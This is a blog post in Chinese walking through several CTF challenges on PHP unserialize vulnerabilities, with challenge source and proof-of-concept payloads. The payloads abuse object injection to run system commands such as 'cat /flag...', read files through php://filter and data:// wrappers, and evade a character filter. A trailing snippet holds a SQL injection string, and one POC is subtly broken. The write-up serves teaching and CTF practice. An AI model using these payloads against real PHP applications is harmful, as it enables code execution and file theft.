反序列化（Unserialize）题目讲解

最新推荐文章于 2024-02-17 23:54:46 发布

小蓝同学`

最新推荐文章于 2024-02-17 23:54:46 发布

阅读量5.3k

点赞数 2

分类专栏：信息安全漏洞文章标签：反序列化漏洞 PHP CTF

本文链接：https://blog.csdn.net/qq_49422880/article/details/119222851

版权

信息安全漏洞专栏收录该内容

38 篇文章 10 订阅

订阅专栏

2021-第五空间智能安全大赛-Web-pklovecloud

网页源码：

 <?php  
include 'flag.php';
class pkshow 
{  
    function echo_name()     
    {          
        return "Pk very safe^.^";      
    }  
} 

class acp 
{   
    protected $cinder;  
    public $neutron;
    public $nova;
    function __construct() 
    {      
        $this->cinder = new pkshow;
    }  
    function __toString()      
    {          
        if (isset($this->cinder))  
            return $this->cinder->echo_name();      
    }  
}  

class ace
{    
    public $filename;     
    public $openstack;
    public $docker; 
    function echo_name()      
    {   
        $this->openstack = unserialize($this->docker);
        $this->openstack->neutron = $heat;
        if($this->openstack->neutron === $this->openstack->nova)
        {
        $file = "./{$this->filename}";
            if (file_get_contents($file))         
            {              
                return file_get_contents($file); 
            }  
            else 
            { 
                return "keystone lost~"; 
            }    
        }
    }  
}  

if (isset($_GET['pks']))  
{
    $logData = unserialize($_GET['pks']);
    echo $logData; 
} 
else 
{ 
    highlight_file(__file__); 
}
?>

POC：

<?php

class acp 
{   
    protected $cinder;  
    public $neutron;
    public $nova;
    
    function __construct()
    {
        $this->cinder = new ace();
    }
}  

class ace
{    
    public $filename='flag.php';     
    public $openstack;
    public $docker = 'O:1:"F":2:{s:7:"neutron";N;s:4:"nova";R:2;}';

}  


$d = serialize($b);

var_dump(urlencode($d));

?>

原理讲解：$file = "./{$this->filename}";if (file_get_contents($file)) {return file_get_contents($file);

主要重心还是放在里，明显我们只需要把filename换成flag.php就可以了。根据常规思想看完结果就往回推，要触发这个函数，只需要把acp里的cinder赋值为ace的对象就可调echo_name函数。但是在这个函数里有一个判断条件，现在的问题就是如何解决这个判断的问题。

这里可以有两种的绕过方法：

通过返回值都为NULL，进入函数。

<?php


$a = unserialize("");

var_dump($a);
echo "<br/><br/>";
var_dump($a->aaa);//指向不存在的属性，返回NULL
?>

测试结果：

既然如此，我们给docker赋值为空即可进入函数。具体的POC大家可以自己写一下。

通过指向前面已经序列化的属性的指针引用

<?php
 class Test {
      var $rr = "ctfer";
      var $qq;
 }
 
 
$pop = new Test();
$pop->qq = &$pop->rr;
$cpp =serialize($pop);
var_dump($cpp);
echo "<br/><br/>";
var_dump(unserialize($cpp));
?>
//O:4:"Test":2:{s:2:"rr";s:5:"ctfer";s:2:"qq";R:2;}
//{ ["rr"]=> &string(5) "ctfer" ["qq"]=> &string(5) "ctfer" }

可以看到反序列化结果一样。这样也是可以绕过的。

2020-网鼎杯-朱雀组-Web-phpweb

fn+f12查看源代码，发现一段与页面上的时间似乎相关，有点类似使用那个call_user_func函数远程命令执行，然后使用hackbar查看果然是POST提交参数，然后我们修改参数，读取网页源码即可（返现果然是用我们猜想的那个函数远程代码执行，经验果然重要）。

网页源码：

<?php
    $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch",
      "escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",
      "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce",
      "array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents"
    );
    function gettime($func, $p) {
      $result = call_user_func($func, $p);
      $a= gettype($result);
      if ($a == "string") {
        return $result;
      } else {
        return "";
      }
    }
    class Test {
      var $p = "Y-m-d h:i:s a";
      var $func = "date";
      function __destruct() {
        if ($this->func != "") {
          echo gettime($this->func, $this->p);
        }
      }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];
    if ($func != null) {
      $func = strtolower($func);
      if (!in_array($func,$disable_fun)) {
        echo gettime($func, $p);
      }else {
        die("Hacker...");
      }
    }
  ?>

没看WP之前，我十分异或，这组题目在CTFHUB中属于反序列化的分组，为什么我没有看到反序列化的函数，搞得我一直以为是RCE。看来WP瞬间明白Unserialize也是一个函数它的参数就是字符串，反序列化之后就可以远程代码执行了。这方法果然够高，这之后的思路就比较简单明了。

直接上POC：

<?php
 class Test {
      var $p = "find / -name *flag*";
      var $func = "system";
 }
 
 echo serialize(new Test());
?>

//输出：O:4:"Test":2:{s:1:"p";s:19:"find / -name *flag*";s:4:"func";s:6:"system";}

寻找之后在输出的最后一行发现一个比较可以装flag的文件，直接读取即可。

<?php
 class Test {
      var $p = "cat /flag_285906012";
      var $func = "system";
 }
 
 echo serialize(new Test());
?>

//输出：O:4:"Test":2:{s:1:"p";s:19:"cat /flag_285906012";s:4:"func";s:6:"system";}

2020-网鼎杯-青龙组-Web-AreUSerialz

题目源码：

<?php

include("flag.php");//包含文件

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {    //如果为1就写文件，为2就读取文件（利用点）
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);   //读取文件并且将结果输出出来
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);//读取文件的经典函数
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {    //销毁类时的数值
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {        //判断字符串是否在32和125之间
        $obj = unserialize($str);//反序列化
    }

}

第一个考虑点，主要重心要放在读取文件上，即op的值需要为2，这样在__destruct()中op==="2"，也能进行绕过。然后就是文件名这里在CTFHUB上已经把文件放在了flag.php上，所以我们将filename='flag.php'即可。

第二个考虑点，绕过is_valid()函数。

方法一：使用public属性进行绕过，因为在protected属性序列化出来的结果中，有字符%00，期ASCII码值不在32~125之间。但是在高级的版本中不是很注意属性值，将prorected换成public，也是可以绕过的。

POC：

<?php
class FileHandler
{
    public $op;
    public $filename;
    public $content;
    
    function __construct()
    {
        $this->op = 2;
        $this->filename = "php://filter/convert.base64-encode/resource=flag.php";
        $this->content = "Hello World!";
    }
    
    
}

$a = new FileHandler();
$a = serialize($a);
echo ($a);

结果（将base64解码即可）：

方法二，反序列化的结果中，如果把表示字符串的s改成S，后面的字符串看成16进制进行处理，后面的字符串可以用十六进制表示，即将%00转化为\00*\00，反序列化的时候，会将\00看成16进制即为0，不影响后面结果。

替换结果：

POC：

<?php


class FileHandler
{

    protected $op;
    protected $filename;
    protected $content;
    
    function __construct()
    {
        $this->op = 2;
        $this->filename = "php://filter/convert.base64-encode/resource=flag.php";
        $this->content = "Hello World!";
    }
    
    
}

$a = new FileHandler();

$a = serialize($a);

$a = str_replace('*','\00*\00',$a);
$a = str_replace('s:','S:',$a);
echo ($a);


?>

一样出现结果。

浙江省大学生网络与信息安全竞赛-决赛-2019-Web-逆转思维

这道题感觉更多的是PHP伪协议使用，反序列化只是之后的简单的使用。

源代码：

<?php  
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?>

看到这一代码思路就比较清晰，过掉几个判断，然后再反序列化即可。但是这里没有任何的类说明就需要读取源码咯，而且发现存在文件读取函数，看看伪协议读取文件。

第一个判断绕过：

需要使text的中的文件内容与welcome to the zjctf相同，可以使用data协议或者input协议

data://text/plain协议

data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=

php://input协议

php://input+post传参

第二个include($file)

这里使用伪协议通过base64读取出来，然后使用base64解码拿到源码，这里使用BS不知道为什么用Hackbar 不行。

<?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>

这里就是要求反序列化之的file值为flag.php即可，这里可以直接读取或则使用伪协议读取。简单POC：

<?php  

class Flag{  //flag.php  
    public $file='flag.php';
}  

$a = new Flag();

echo serialize($a);

?>

//O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

小蓝同学`

关注

2
点赞
踩
6

收藏

觉得还不错? 一键收藏
0
评论
反序列化（Unserialize）题目讲解

[RCTF2015]EasySQL这道题没有什么思路，就是看网上的WP写出，Sql-lib好像也有这道题。这里要使用的一种注入方法叫做二次注入。具体我就不细讲了。直接放语句上去：admin"||(updatexml(1,concat(0x7e,(select(database()))),1))#123"||(updatexml(1,concat(0x7e,(select(database()))),1))#...
复制链接

扫一扫